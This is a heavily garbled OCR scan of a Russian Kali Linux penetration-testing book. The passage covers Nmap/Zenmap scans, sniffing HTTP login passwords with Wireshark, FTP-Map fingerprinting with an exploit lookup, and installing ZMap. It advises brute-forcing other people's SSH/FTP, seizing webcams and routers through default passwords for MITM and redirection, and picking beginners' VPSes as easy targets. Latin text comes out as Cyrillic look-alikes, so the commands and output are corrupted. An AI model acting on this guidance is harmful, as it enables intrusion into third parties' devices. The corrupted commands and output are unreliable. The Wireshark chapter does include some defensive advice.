хотите чего-то более дружеского и привычного, то обратите своё внимание на 2ептар. 
Это графический интерфейс для ІМтар. 


Инструменты Профили Помощи 


цмь кеЫооЬ 

Команда птар -Т4 -А -ѵ Ісаіі 1ооі$ 




профили іпіегме «ап 




ѴЕЯЗІОК 

ргото і.з.згсз 

РоПЙд И1р4 


. СП», ИМЛЛСЕО5ТАТ1ЛС0ОЕ5. 


р ( рѵісол : ЦпЬлоып (аѵісоп НЯ: 913СС964*8А5Г71С2Э999в652Св1в184 
I (іИр-депргаТог; ЧоЫРггч 4.3 

I НПр-веОю* . Но АНоы от РиЫіс Неэдег іп ОРТІЯВ ге>рол*е (Ыаіиі со* 49Л 
І.МСр-іегѵег-йеавег: пдіпх/1.6.3 

| Мір-иііе: \»90\х98\х09\жЯО\х01\х81\х01\хв2\»01\хв8\іі01\х83\хВ8\хвС\і06\»В5\і08\хВО\х01\іа2\хВ1\х8В Каіі С 
44/1ср орел Мір АрасЬе Ы*р9 2.2.29 ПІМд) *о4 >>1/2.2.29 брмвЗІЛ 3.1*-(ір> ЖР/1.3.291 

| ЫтреыКоЙі: сет НЕ АО РОСТ ОРПОН5 ТШЕ 
I РоІепПаНу Г15ку **ІЬові. ТРАСЕ 
I 5е* Ь«р: //ливр . огд/пзевос/зс при/ЬПр- пеІЬовз. Ніяі 

I МТр-іегхег-ЛеаДег: АрасТіе/2.2.26 ЦІліх) еМ ИІ/2.2.26 0рел551./1.8.1е-(ір5 РІ9У5.3.29 


\«08\хА1\х0в\іВГ\»Х>а\*8в\«01\хЯ1\хОв\«вЕ\«М\«ВА \х08\хВв\к08\ісВО\»01\х81\>01\ка21хП1\«а8\х01\хВЗ\«П8. 


е (»«хІ/Ы»1; сп*гіеі-і 


рогі/ргото зегѵісе 
Ш/тср грсМгн) 
Ш/иОр грсЫгиІ 
47987/оОр >(«1к> 
54213/тср >МЫ> 


443/іср орел >>1/МІр 

і . и... — --оміусоллесі: 


лділа 1.9.3 
ипиирротТеО ѵегиоп 
ТТіе р?аіл НТТР геімезт « 


I РиЫіс К»у Тура: гм 

I РиЫіс Кру ЫО: 2948 

I Сідпэіиге АІ|0ГІОш: 5Ьа2С6«іМ«5АЕпсгурІіоп 

I N01 ѵаІЮ аПег: 2в28-82-82Т13:35.« 

I Н05: м90 415* 281Ь ІмЬ <11(4 2»9Г 4669 1*7* 

I 5НА. 1: 0с<11 8сЛ *5(6 12а9 (249 8(9* (916 ((65 6(99 М51 

I «І-баТе: 2815-98-28714:94:67*99:99; 16і (гое ісапеег им 
'і-лехтргоіопед: 


ОржЗЗК 3.3 I ргоТосо! 2.91 



1а:1е:ЬЗ:85:М:81:(9:е4:Ь(:е9:8І 
(е:е7.78.*4:10:87:29:94:93:29:» 
ОроеЗЗМ 5.3 ІргоТосоІ 1.( 


(Нажмете на изображение, чтобы увеличить) 


По большому счёту, нужно только ввести адрес цели. Уже установлен профиль 
сканирования по умолчанию, который вы всегда можете поменять на другой. Вам не 
нужно помнить и вводить ключи, как это необходимо для приложения командной 
строки. Всё просто, вывод раскрашен разными цветами, что облегчает восприятие. Есть 
несколько вкладок, в которых визуализирована и обобщена полученная информация. 
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Сканирование Инструменты Профиль Помощь 
Цель каЫооЬ 


од Мт ар Порты (ХОСТЫ Топология Детали кос 

Порт Протокол 


3306 ІСр 
4443 (ср 


РГОГГРО 1 3 5гсЗ 


ЬКр АрэсЛе ЬКрй 3 2 20 Кипи) тогі.гаІЯ 2.26 Ореп5$1Л.О. 

трсЬіпО 2-4 ІЙК #1000001 




(ргоіосоі кепюп 30) 

Ореп55Н 5,3 (ргоіосоі 2.0) 

Орсп$5Н 5 3 (ргоіосоі 1 0Ф) 

Му50С 5 5 35-33.0-Іод 

ДрасЛе Мера 2 4 10 ІШпіх) РИРй 3 29 трго-ІИіЛ .4 7-02 Ореп55У1 0 1е-йр$) 


(Нажмете на изображение, чтобы увеличить) 


Сканирование Инструменты Профиль Помощь 


Цель каі ! олЧ ѵ Профиль Іпіепж кап « Сканирование 

Команда птар -Т4 -А -» каІІЕоо& 


вывод Мшар Порты / Хосты Топология Детали кос т л Сканирование 


каіі Іооів 1185 28122 381 

Статус хоста 

Состояние: іір 

Открытье порты: 11 

Отфильтрованные порты: 3 
Закрытые порты: «86 

Просканированные порты 1000 
Времв работы 112232 

Последние загрузка Нш Аид 2» 09 54 29 2015 

Адреса 

ІРѵ4 185 28122 38 
іРѵб Не доступно 
МАС не доступно 


# 



(Нажмете на изображение, чтобы увеличить) 


Что делать с полученной в ІЧтар информацией 

Собственно, а что нам дают все эти открытые порты, все эти службы, все эти 
компьютеры с РТР и прочим? 

Если вы умеете пользоваться только ІМтар, то полученная в ней информация вряд ли 
пригодится. Это только начало пути. Варианты использования полученной 
информации: 

е если нашли веб-сервер, то для начала можно просто открыть и посмотреть что 
там. Варианты бывают разные — бывают обычные сайты, которые видны в 
Интернете по доменному имени, бывают сайты в разной степени готовности 
начинающих системных администраторов и веб-мастеров. Бывает, можно 

По материалам сайта ѴѴеЬѴѴаге.Ьіі 


308 
















Тестирование на проникновение с помощью Каіі Ыпих 2.0 


просто пройтись по каталогам, посмотреть приготовленные файлы, попробовать 
стандартные пароли для рІтрМуАсІтіп и т. д. 

• РТР, 55Н и многое прочее можно брутфорсить. Если удастся подобрать пароль, 
то можно получить доступ к частному РТР или вообще завладеть всем 
компьютером, если удастся подобрать учётную запись 55Н. Ссылки на 
инструкции по брутфорсу даны в конце статьи. 

• особенно легко, практически голыми руками, можно брать веб-камеры — очень 
часто там стандартные пароли, которые можно нагуглить по модели камеры. 

• также интересны роутреры. Довольно часто в них стандартные (заводские) 
пароли. Получив доступ в роутер можно: выполнить атаку человек-по-середине, 
сниффинг трафика, перенаправить на подложные сайты, на сайты-вымогатели и 
т. д. 

• зная версии запущенных программ можно попробовать поискать эксплойты для 
них. Ссылки на материал по эксплойтам также дан в конце статьи. 

• если вы совсем новичок, то рекомендую программу Агті1:а§е. Она может: 
автоматически искать и применять эксплойты, брутфорсить различные службы. 
У программы графический интерфейс — вообще она довольно простая. 
Материал по Агті1:а§е: « Инструкция по АгтИаае: автоматический поиск и 
проверка эксплойтов в Каіі Ыпих ». 

Где брать адреса для сканирования? 

Типичными лёгкими целями являются ѴР5, которые настроили начинающие системные 
администраторы. Если вас интересует сканирование адресов в конкретном городе или 
по конкретному провайдеру, то можно воспользоваться этим сервисом . 

Дополнительный материал по Мшар и о том, делать с полученными 
результатами сканирования 

Для продолжения чтения рекомендуются: 

• Книга по ІМтар на русском 

• ВгиТеХ: программа для автоматического брутфорса всех служб 

• ТНС-НусІга: очень быстрый взломщик сетевого входа в систему (часть первая) 

• База данных эксплойтов от ОДепзіѵе 5еси гіТу (создателей Каіі Ыпих) 

• МеТазрІоіІ: ЕхрІоНабоп Ргатеѵѵогк и зеагсбзріоіі: — как искать и как использовать 

эксплойты 

• Инструкция по АгтИаае: автоматический поиск и проверка эксплойтов в Каіі 

Ыпих 

• РТР-Мар: определяем программное обеспечение и его версию для РТР-серверов 

и ищем для них эксплойты 

Подборка материала для системных администраторов: 

• Как установить безопасный 5РТР сервер в Ыпих 

• Как включить 55Іт вход без ввода пароля 

• Настройка защищённого ѴР5 (ѴР5) на РеЬіап. Часть первая: Установка Арасбе, 

РНР, Му5СЦ. 
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• Как настроить ^аіІ2Ьап для защиты сервера АрасКе НТТР 

• Как скрыть версии веб-сервера АрасНе и РНР (на Ыпих и ѴѴіпсІоѵѵз) 

• Как усилить веб-сервер АрасНе с помощью тосі зесигііу и тосі еѵазіѵе на 

СепЮ5 

• Как установить МосІЗесипІу (тосі зесигііу) на АрасНе (на ѴѴіпсІоѵѵз) 

• Как установить АрасНе, МагіаРВ/Му5Щ и РНР на СепЮ5 (І.АМР) 


Глава 53. Книга по ІЧтар на русском 

Источник: Шрв://птар. огд/тап/ги/ 

Информация по скриптам Итар (на английском): Ь іірв://птар.огд/пведос/іпдех.ЬітІ 

Самая последня версия документации по Итар (на английском): 
Ніір://птар. огд/Ьоок/тап. ЫтІ 

Официальная книга по Итар от создателей Итар (на английском): 
Ыір://птар. ога/Ьоок/іос. ЫтІ 

Читать онлайн либо скачать книгу: Ніір://уѵеЬѵѵаге.Ыі/?р=4540#5 


Глава 54. Взлом пароля веб-сайта с использованием \Л/іге5Нагк 
(и защита от этого) 

Вы знаете, что каждый раз, когда вы заполняете ваши имя пользователя и пароль на 
веб-сайте и нажимаете ЕІМТЕК, вы отправляете ваш пароль. Хорошо, конечно вы это 
знаете. Как ещё мы собираемся авторизовать себя на веб-сайте?? Но (да, здесь есть 
маленькое НО) когда веб-сайт позволяет вам авторизоваться используя НТТР 
(РІаіпТехІ:), очень просто захватить этот трафик от любой машины в локальной сети (и 
даже в Интернете) и проанализировать его. Это означает, кто-то может хакнуть пароль 
от любого веб-сайта, использующего НТТР протокол для авторизации. Понятно, чтобы 
сделать это через Интернет вы должны быть способны сидеть на шлюзе или 
центральном хабе (ВОР роутеры смогли бы — если у вас есть доступ, и трафик 
проходит через них). 

Но сделать это в локальной сети проще и, в то же время, это поразит вас, насколько 
небезопасен на самом деле НТТР. Вы могли бы сделать это с вашим соседом по 
комнате, вашей рабочей сетью или даже школьной, сетью колледжа, университета, 
если сеть позволяет широковещательный трафик и ваша сетевая карта может быть 
настроена на неразборчивый режим. 

Итак, давайте попробуем это на простом веб-сайте. Я это буду делать внутри одной 
машины. Вы же можете попробовать это между Ѵіг1;иаІВох/ѴМ\А/аге/Физическими 
машинами. 

Обратите внимание: некоторые роутеры на делают широковещательную рассылку, в 
этих отдельных случаях ничего не получится. 
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Шаг 1. Запуск \Л/ігезНагк и захват трафик 

В КаІІ І_іпих вы можете запустить ѴѴігезЬагк проследовав 
Приложения > КаІі Ыпих > Тор 10 Зесигііу Тооіз > ѴѴігезИагк 

В \А/і гезЬагк перейдите к пункту меню Саріиге > ІпІегТасе и выберите интересующий вас 
интерфейс, у меня соединение по проводу, поэтому я выбираю еіЬО, для 
беспроводного доступа интерфейс может называться ѵѵІапО. 



ѴУігехЬагк: Саріиге ІпіегГасез 

МОЯ 


Оеѵісе 

Оезсгірбоп ІР Раскеіз Раскеіз/з 

ф © 

еШО 

10.0.2.15 

0 

П @ 

пЕІод 

попе 0 

0 

П @ 

апу 

попе 110 

0 

п @ 

Іо 

127.0.0.1 110 

0 

Справка 

Біагі: 

Орііопз 

Закрыть 



В идеале, после нажатия кнопки 5ТагТ ѴѴігезИагк должен начаться захват трафика. Если 
этого не произошло, то перейдите в меню Саріиге > 5Та ГТ 


*> 


ЕсІіТ Ѵіеѵѵ 



Со СарТиге Апаіуге 
іпТегЕасез... 


РіІТег: 



ѴѴІКЕ 5 НАК 


ОрЦопз... 


ЗТагТ 


5Тор 

РезТагТ 


БТаТізТісз ТеІерЬопу Тооіз ІпТегпаІз Неір 

аг1+| 4 ^ ? & I 

ѵ Ехргеззіоп... 


Рориіаг ЫеЪл/огк Ргоіосоі А 

іѵ 51934 {тот /Ігипк-1.10) 




СарТиге Ріііегз... 
РеРгезИ ІпТегРасез 



I 


Шаг 2. Фильтр захваченного трафика для поиска РОБТ данных 

В то время, пока \Л/іге$Нагк прослушивает сетевой трафик и захватывает его. Я открыл 
браузер и залогинился на веб-сайте, используя имя пользователя и пароль. Когда 
процесс авторизации был завершён и я вошёл на сайт, я вернулся и остановил захват в 
ѴѴігезбагк. Вообще, фильтрацию трафика можно делать и не останавливая захват. 
После запуска, например, можно установить фильтрацию и просматривать только 
захват, удовлетворяющий определённым требованиям. 
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Обычно в ѴѴігезНагк множество данных. Но нас интересуют только данные, 
отправленные методом Р05Т. 

Почему только Р05Т? 

Потому что когда вы печатаете ваше имя и пароль и нажимаете кнопку входа, данные 
на удалённый сервер отправляются методом Р05Т. 

Для фильтрации всего трафика и нахождения данных Р05Т, наберите следующее в 
окне для ввода фильтра: 


НТТр.гециезТ.теТНосІ == "Р05Т" 


Посмотрите скриншот внизу. Он отображает 1 событие событие Р05Т. 


Саріигіпд Ігот «*ЬО [ѴѴігевИаПс 1.10.2 (5VN Кв» 51934 Гг от Лгипк-1.10)] 


Рііе ЕЛІ Ѵіеѵѵ Со Слріигс Апаіуге 5(а(1<(К1 ТеІерКолу Тооі» ІпіспмІ* Нвір 

© ил * еіч ♦ ♦ > т ± нт 

Рі(ег ЬПр.геци*И.те«іо<і == "Р05Т” ѵ Ехргеміоп Сіеаг 

N0. Тітв 5оигсо ЕЬКіиІІоп Ргоіосоі ІвлдІІ I 


П В0Й.- 


м 


■ЖДИИДИГЯДЯВДШ 


Ргате 9: 823 Ьуіе* оп мп І6584 Ьіт*). 823 Ьу(е» саріигев (6584 Ьт) оп іпіегіасе О 
Еікегпеі II, 5гс: с*впи*Со_4Ь:1в:69 (08:00:27:4Ь:1в:б9>, Оаі: ВеаІіекЦ_12:35:02 (52:54:00:12:35:02) 
Іпіегпеі Ргоіосоі Ѵегеісп 4, 5гс: 10.0.2.15 (10.0.2.15), 1*1: 185.26.122.50 (185.26.122.50) 
Тгвг»ію**іоп Сопігоі Ргоіосоі, 5гс Рог(; 37529 (37529), 0*1 Роге Нер (80), 5вд: 1, Аск: 1, Юн: 769 

Мурвгіехі Тгапеіег Ргоіосоі 

кше-Ьазеб іехі баса: арріісаііоп/х-ѵіж-іоглі-игіепсоіівв 


0010 

ома 

оѳэѳ 

0040 


52 54 00 12 
03 29 ае 89 
7а 32 92 99 
72 10 42 77 
61 67 69 бе 
31 ОЙ Оа 48 
2в 62 69 7а 
За 20 46 6< 
31 31 ЭЬ 20 
ЭЬ 20 72 76 
21 32 30 31 


35 02 08 00 27 4Ь іб 

40 00 40 Об 49 еа Оа _ 

00 50 аЗ 56 4* 66 09 89 68 02 
00 00 50 41 

2* 70 68 70 20 48 54 54 
61 73 74 

06 Оа 55 73 65 72 26 41 67 65 бе 
7а 69 6с бс 61 2г 35 2е 30 
4< 69 6» 75 

За 33 31 2» 30 29 20 47 
30 30 31 30 


ВТ..5.. 


45 00 
Ь9 Іа 
50 18 


31 2е оуіп.рНр 


..0.0. I. 


65 62 77 61 72 65 1..Н081: «еЬ»аге 

. .ив вг-АдепІ 
гііі а/5.0 (X 
и по і «Ѳ6_64 


в 36 5( 3 
7 65 63 61 
9 72 65 6 


ООбО 20 74 65 78 74 2І 66 7 
ООвО 63 61 74 69 бі бе 21 78 68 7 


1 70 70 6 

. .. . -- .С 2Ь 78 6і 

1 70 70 вс 69 63 61 74 69 6І бе 21 78 6 


саіюп/х 

.аррЦса 




К 165 Омріаувй 1 (0,6%) 


(Нажмите на изображение, чтобы увеличить) 


Шаг 3: Анализ данных Р05Т на наличие имени пользователя и пароля 

Сейчас кликните правой кнопкой на этой линии и выберите ГоІІоѵѵ ТСР 51еат 


[ѴѴіге.Нагіс 1.10.2 (5ѴМ Кв» 51934 Ігот Лтпк-1.10)] 


Со Саріигв Апаіуге 5иіиьс> ТеІерПопу Тооі» ІпіеггиІ* 


В □ 




Гіпр.гециеіі.тетоб == “Р05Т 

Тітв 5вигсв 


Ехргеміоп. Сіеаг Арі 
Ргоіосоі ІепдІІ Іпіо 


Магк Раскеі ((оддіе) 

Ідпоге Раскеі ((оддіе) 

5е( Типе Кеіегепее ((оддіе) 
Тепе ЗиЛ... 

Раскеі О 


МапиаІІу Не&оіѵе Авбгеіі 
Арр(у а> РіКег 
Ргераге а РіКег 
Сопѵесзаьоп РіКег 
Соіопге Сопѵегыпоп 


Ргате О; 823 Ьу(еі оп мгв (6584 Ы(а), 823 
ЕіНвгпві II, 5 
Іпіегпеі Ргоіосоі V 
Тгап*го**юп Сопігоі Ргоіосоі, 5гс Роге 37Т 
иурвг(в«( Тгапеіег Ргоіосоі 
ипе-Ьамв іехі ваіа: аррІіса(іол/і лиг (оп 


0000 52 54 ОС 12 35 02 08 00 27 4Ь ів 69 08 I 

0010 03 29 ае 89 40 СЮ 40 Об 49 еа Оа 00 02 ( 

0020 7а 32 92 99 00 50 аЭ 56 41 Ы 09 89 68 і 

0030 72 10 42 77 00 00 50 4І 53 5* 20 2І 77 

0040 61 67 69 6в 2в 70 68 70 2048545450; 
[0050 31 Об Ов 48 61 73 74 3 
а 06 Оа 55 7 


7 65 62 7 


д 61 7 


5пож Раскеі іп Ыеѵѵ Мшбоѵ» 


9 бе 75 

0090 ЭЬ 20 72 76 За 33 31 2е 30 29 20 
ООаО 21 32 30 31 30 30 
ООЬО 78 21 33 31 2* 30 20 49 63 65 77 65 61 73 65 
ООсО 2ІЗЭ312еЭ42*Э00б Оа 41 63 63 65 70 
0060 20 74 65 78 74 21 68 74 

ООеО 63 61 74 69 61 бе 21 78 

ООІО 2с 61 70 70 6 С 69 63 61 


/2010010 1 Рігеіо 


бе 2С 61 70 70 бс 69 
74 66 бс 2> 78 бв 6с 
69 61 6в 21 78 6в бс 


/31.4.О. .Аесері: 
іехі/Ьі тІ.аррЦ 
саііоп/х Ьілііехті 
.аррііса Ікоп/ті 


еу «і 


«Ііѵе сар(иге т ргодгеі 


і 172 РКрІауес) 1 (0.6%) 


РгоЯе: ОеІаиК 


(Нажмите на изображение, чтобы увеличить) 
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Это откроет новое окно, содержащее что-то вроде такого: 


Роііоѵѵ ТСР ЗЕгеат 


N00 


Бігеат СопІепЕ 


Р05Т /ѵр-Іодіп.рЬр НГТР/1.1 
НозТ: ѵеЬѵѵаге.Ьіг 

Іізег- Адепт: МогіІІа/5.0 (XII; 1_іпих х86_64; гѵ:31.0) Сеско/20100101 Рігеіох/31.0 
Ісе\ѵеазеІ/31.4.0 

АссерТ: ТехТ/НТтІ, аррІіса'Сюп/хНі:тІ+хтІ / аррІіса'(:іоп/хтІ;д=0.9, */'*;д=0.8 

АссерТ-Ьапдиаде: еп-ІІ5,еп;д=0.5 

АссерТ-ЕпсосІіпд: дгір, сІеііаТе 

Веіегег: НТТр://ѵѵеЬ\ѵаге.ЬІ 2 /\ѵр-Іодіп.рЬр 

Соокіе: _да=СА1.2.258398760.1413685052; ѵаззир_зсгееп_гез=1920%20х%20975; 

РНР5Е5510=6 1 600с Ь е 8с1 Ь Зе Ы 377154( а е8057Ь ЗЬ сі; ѵгогфгезз_ТезТ_соокіе=ИР+Соокіе+сЬеск; 

ѵІзісЫсЬ3458ссі52іс012е593сШЫа54с8е8 

СоппесТіоп: кеер-аііѵе 

СопТепТ-Туре: аррІісаТіоп/х-ѵлѵѵ-іогт- игіепсосіесі 
СопТепТ-ЬепдТН: 149 


Іоа=Рі топ&р\я/а=іи5Ітог1ез1; 


&гететЬегте=Іогеѵег&ѵр- зиЬті 1: = 9 бОО ? &92 !І бОО ? бВЕМ)09бВ9 ? &О І^вгчоСРб 
В8&гес1і гесТ_То=Іг(:'(:р 9 бЗА 9 б2Р 9 б2РѵеЬѵаге . Ьіг^гРмр-асІтіп 9 б2Е&'1:ез1:соокіе=1НГТР/1 .1 200 ОК 
Зегѵег: пдіпх/1.6.0 
ОаТе: 5ип, 15 РеЬ 2015 11:29:32 ОМТ 
СопТепТ-Туре: ТехТ/ЬТтІ; сЬагзе1:=ЦТР-8 
СопТепТ-ЬепдТН: 3801 
СоппесТюп: кеер-аііѵе 
Х-Ро\ѵегесІ-Ву: РНР/5.3.28 
Ехрігез: МеЩ 11 Іап 1984 05:00:00 СМТ 
СасНе-СопТгоІ: по-сасЬе, тизТ-геѵаіісіаііе, тах-аде=0 


ЕпЕіге сопѵегзаЕіоп (5182 ЬуЕез) 



Найти 

Сохранить как 

Печать 


А5СІІ 


ЕВСйІС 


Нех йитр 


С Аггауз О Ра\ѵ 


Справка 


РІІТег ОиЕ ТГііз БТгеат Закрыть 


Видите я выделил строчку Іо§=Оітоп&рѵѵсІ=іи5І^огІе5І? 

Т.е. 

Іо§=Оітоп (имя пользователя: Оітоп) 
рѵѵсЦ'изДогІезІ (пароль: іизДогІезІ) 

Вот так вот, выдуманный пользователь ѴѴеЬѴѴаге.Ьіг спалил свой пароль. 

Как бороться с перехватом трафика ѴѴігеБНагк и другими подобными 
программами 

1. Не позволяйте посторонним лицам иметь доступ в вашу сеть. Например, не нужно 
свой \Л/і-Рі делать публичным, не нужно сообщать пароль от него посторонним лицам. 

2. Когда вы сами пользуетесь публичными точками доступа, то, хотя бы, помните об 
угрозе перехвата пароля. Даже если вы не производили вход (не вводили логин и 
пароль), то ваш браузер постоянно обменивается с сайтами, на которых вы 
авторизованы, данными кукиз. Это не тоже самое что пароль, иногда кукиз просто 
бесполезны. 

Это не значит что нужно прекратить пользоваться публичными точками доступа. Но 
поменяв пароль, когда вернётесь к «безопасной» сети, вы сделаете 
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бессмысленным захват тех данных, который мог произойти пока вы пользовались 
публичной сетью. 

3. Используйте ѴР1М, эта технология способна решить все проблемы с небезопасными 
сетями разом. 

4. Самый действенный способ — 551,-сертификаты. У меня по этому поводу две 
новости: плохая и хорошая. Начну с плохой: от нас, от пользователей сайтов, не 
зависит, установлен ли на веб-сайте 551-сертификат, если сертификат не установлен, то 
мы никак не можем это исправить. Хорошая новость: почти все популярные веб сайты 
(разные твитеры, вконтакте, фейсбуки, гугл-почты, яндекс-почты и т. д.) имеют эти 
сертификаты. Даже у Википедии теперь есть! 

Если вы владелец сайта, то можно задуматься об установлении 551-сертификата. Кроме 
уже названного преимущества (невозможность перехвата данных, 
отправляемых/получаемых на/с вашего сайта), ещё и Гугл обещала учитывать наличие 
551-сертификата при ранжировании (если этот сертификат есть, то позиции в поиске 
выше). Проблема в том, цена самых дешёвых сертификатов, даже по акции со скидкой, 
начинается от 400 рублей. За эти деньги можно купить несколько месяцев хостинга, 
при весьма эфемерной выгоде от наличия 551-сертификата. 

Если вас всё-таки заинтересовали эти сертификаты, то рекомендую обратиться к моей 
статье « Что такое 551-сертификаты, для чего они нужны и как сэкономить покупая 

сертификат ». Там и где купить со скидкой, и как установить, и прочее. 


Глава 55. РТР-Мар: определяем программное обеспечение и его 
версию для РТР-серверов и ищем для них эксплойты 

Ріртар сканирует удалённые РТР-сервера для идентификации, какое программное 
обеспечение и какой версии они используют. Она использует специфичные для 
программ «отпечатки пальцев» для обнаружения имени программного обеспечение 
даже тогда, когда банеры были изменены или удалены или когда некоторые функции 
были отключены. РТР-Мар также попытается найти эксплойты для программы/версии, 
используемой для РТР сервера. РТР-Мар также содержит инструменты для удалённого 
«снятия отпечатков». 


Адрес проекта: НіТрзУ/щіНиЬ.сот/НурзигизЛТртар 

Установка РТР-Мар на Каіі Ыпих 


1| 

ар1-§е1: іпзіаіі аиіотаке аиІосопГ 

Я все сторонние программы ставлю в каталог ~/ор1 

1| 

сс) ~/орТ/ 

21 

ёіТ сіопе §ІТ//§ііЬиЬ.сот/РІур5иги5/Пртар 

3| 

сс) Пртар/ 

4| 

аиІогесопГ 

51 

,/сопГі§иге 

6| 

таке 

71 

5ііс]о таке іпзіаіі 
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Использование РТР-Мар 


і 


ТТртар -5 [ЬозТ] [ОРТІОІМ5]... 


гооІг.і'л'еЫ'.'.ііѵ-КаІі:-# ТТртар -5 -з 119.76.61.110 

:: ЗТагТіпд РТР-Мар 0.10 - Зсаппіпд (119.76.61.110:21)... 

:: РТР Ваппег: 220 исТТрсІ РТР зегѵег геасіу. 

:: Т гуіпд То Іодіп міТТі: апопушоиз: МЦІЬЬ 
:: 530 Ьодіп іпсоггесТ 

:: Тгуіпд То сІеТесТ РТР зегѵег Ьу Ьаппег... 

:: Тгуіпд То сІеТесТ РТР зегѵег Ьу ТіпдегргіпТ . .. 

:: РіпдегргіпТ заѵесі: 119.76.61.110-ТіпдегргіпТ Лод 

:: ТТііз тау Ье гиппіпд : 

+-+ 

1) МиРТРсІ 2.6 - 2.1% 

+.+ 

2) РгоРТРсІ 1.2.3 - 3.1% 


+-+ 

3) РгоРТРсІ 1.2.2 - 3.2% 

+. . -.-.+ 

:: ЗеагсЬіпд ехрТоіТз... 

+-+ 

| ѵѵи-ТТрсІ 2.6.2 - ВешоТе йепіаТ оТ Зегѵісе ЕхрТоіТ (миТТрсІ-Тгеегег.с) | 

+ --.... . -.— . ..-+ 

| ЬТТр ://ехрТоіТ -сІЬ .сот/сІомпТоасІ/1151 
+-+ 


:: ІІпаЬІе То ЬеТегтіпе РТР рогТ зедиепсе питЬегз 
. Зсап Тог: 119.76.61.110 сотрІеТе ::. 

:!: РТеазе зепсі ТЬе ТіпдегргіпТ То Ьурзигиз@таіТ . ги То ітргоѵе РТР-Мар. 


:: Заѵесі Тод ТіТе: 119.76.61.110. Тод 

гооТ@МеЬМаге-КаІі:~# | 


1| 

Опции: 


2 1 

-5сап, -5 

- Начать РТР сканирование. 

3| 

-зегѵег, -з <ТіозТ> 

- РТР сервер. 

4| 

-рогТ, -Р <рогТ> 

- РТР порт (по умолчанию: 21). 

5 1 

-изег, -и <изег> 

- РТР пользователь (по умолчанию: апопутоиз). 

б| 

-раззѵѵогсі, -р <раззѵѵогсІ> 

- РТР пароль (по умолчанию: МІІИ). 

71 

-ехесиТе, -х <стсі> 

- Запустить команду на РТР сервере. 

81 

— поТіп§егргіпТ, -п 

- Не создавать отпечаток пальцев. 

91 

-Іо§іп, -А 

- Только залогиниться, напечатать вывод и выйти. 
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101 

--Ію гее, -Р 

- Принудительно создать отпечаток. 

111 

—оиТриТ, -о <4іІе> 

- Файл вывода. 

121 

— Іізі, -1. <раіН> 

- Получить список файлов и каталогов на РТР сервере. 

131 

— сІеІеТе <ра0і> 

- Удалить файлы/каталоги на сервере. 

141 

— ІазТ-тосІіЛесІ, -т <РіІе> 

- Вернуть время последней модификации заданного 
файла 

151 



161 

Опции Риггег: 


171 

-4іі22ег, 4 

- Использовать Риггег. 

181 

-4и22ег1еп§1:Р),-Ь <длинна> 

- Длина буфера для отправки, (по умолчанию: 256) 

191 

-4и22ег-поІо§іп, -1 

- Не логиниться. 

201 



211 

Общие параметры: 


221 

-ѵегзіоп, -ѵ 

- Показать информацию о версии и выйти. 

231 

-беір, -б 

- Показать справку и выйти. 


Кстати, если судить по адреску электронной почты ( Нур5игіі5@таіІ.ги ) оставленному 
для отправки на него новых отпечатков и соответствующих ему названий 
программного обеспечения, проект создан нашим соотечественником. 


Глава 56. 2Мар или Как просканировать все ІРѵ4 адреса мира за 
45 минут 

2Мар — это быстрый сканер сети, созданный для исследования обширных подсетей 
Интернета. На обычном настольном компьютере с гигабитным каналом, 2Мар может 
просканировать все публичные ІРѵ4 адреса в течение 45 минут. С десятью гигабитным 
каналом и РР_КІІ\ІС, сканирование с 2Мар всех ІРѵ4 адресов может занять до 5 минут. 

Предыдущие сетевые инструменты создавались для сканирования небольших сетевых 
сегментов. Архитектура 2Мар изначально строилась для сканирования всех адресов 
мира. Программа построена в модульной марене, чтобы позволять инкорпорироваться 
с другими инструментами исследования сети. 2Мар работает на СІМІіДіпих и из 
коробки поддерживает ТСР 5ѴЫ и эхо запросы ІСМР при сканировании. 

2Мар более чем в 1300 раз быстрее чем именитый конкурент ІМтар на наиболее 
агрессивных дефолтных настройках при той же точности. 

Исходный код программы: бНрзУДііЬиЬ.сот/гтар/гтар 


Требования для 2Мар 

2Мар, в настоящее врем, работает только на 64-битных системах. При работе ему 
нужно 600 Мб оперативной памяти. Для компиляции нужен СМаке 2.8.12 или выше. 
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Установка 2Мар 
Установка на Ресіога 19+ 


Просто наберите: 


1 


ушт іпзТаІІ ітар 


Если вы хотите установить на АгсЫіпих, пожалуйста, посмотрите АІІК 
ссылку: НіТр5://аиг.агсЫіпих.огй/раскайе5/2тар/ 


Компиляция 2Мар 
Установка 2Мар на КаМ Ыпих 


На Каіі Ыпих не ставится. При компиляции появляется ошибка: 


1 


СМаке 2.8.12 ог Ы§Ьег І5 гециігеб. Ѵои аге гиппіп§ ѵегзіоп 2.8.9 


Т.е. нужен СМаке 2.8.12 или более высокой версии, а на Каіі СМаке 2.8.9. 


Для 2Мар нужны СМР — бесплатная библиотека для вычислений с произвольной 
точностью, — §еп§е1ор1: и ІіЬрсар. 2Мар также использует Яех и Ьуасс. Эти пакеты на ОС 

семейства ОеЬіап можно установить так: 


1| 

Бибо ар!-§е1: іпбіэіі ЬиіІб-еББепбаІ стаке ІіЬ§трЗ-беѵ §еп§е1ор1: ІіЬрсар-беѵ РІех Ьуасс 
ІіЬізоп-с-беѵ рк§-сопРі§ 

На КНЕІ,- и основанных на Ребога системах запустите: 

1| 

Бибо уит іпбіэіі §тр §тр-беѵеІ §еп§е1ор1: ІіЬрсар-беѵеІ РІех Ьуасс 

Скачайте исходный код ИМрзУ/йіІбиЬ.сот/гтар/гтар 

1| 

ёіі сіопе Ы:1:р5://§М:ЬиЬ.сот/2тар/гтар.ёМ: 

Теперь, как обычно, 3 шага: 

1| 

стаке [-0\Л/ІТН_КЕ0І5=ОМ] [-РѴѴІТН Д50И=0М] [-ОЕНАВІЕ_ОЕѴЕЮРМЕНТ=ОМ] ./ 

2 1 

таке 

3| 

$ибо таке іпзіаіі 


На Ыпих МІПІ компиляция прошла успешно, но установка прерывалась ошибкой: 


1| 

- іпбіэіі сопРі^игабоп: "" 

2 1 

СМаке Еггог аі 1 пзТаІІСопТРіІе5.стаке:2 (ТМе): 

3| 

Тііе СОРУ саппоі: Ріпб 

4| 

ѴЬоте/тіаІ/орі/2тар.§ііДа§5/ѵ2.1.0-ВС2/$./сопР/ЬІаскІі5І:.сопГ. 

5 1 

СаІІ Біаск (гпобі: гесепі саІІ Рігбі): 

6| 

стаке_іпз1:аІІ.стаке:36 (іпсіибе) 

71 


81 

МакеРіІе:66: ошибка выполнения рецепта для цели «іпзіаіі» 

91 

таке: *** [іпБІаІІ] Ошибка 1 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Вместо того, чтобы разбираться в чём ошибка, я поменял содержимое файла 

Іп$ІаІІСоггіРіІе$. опаке. Было: 


1| 

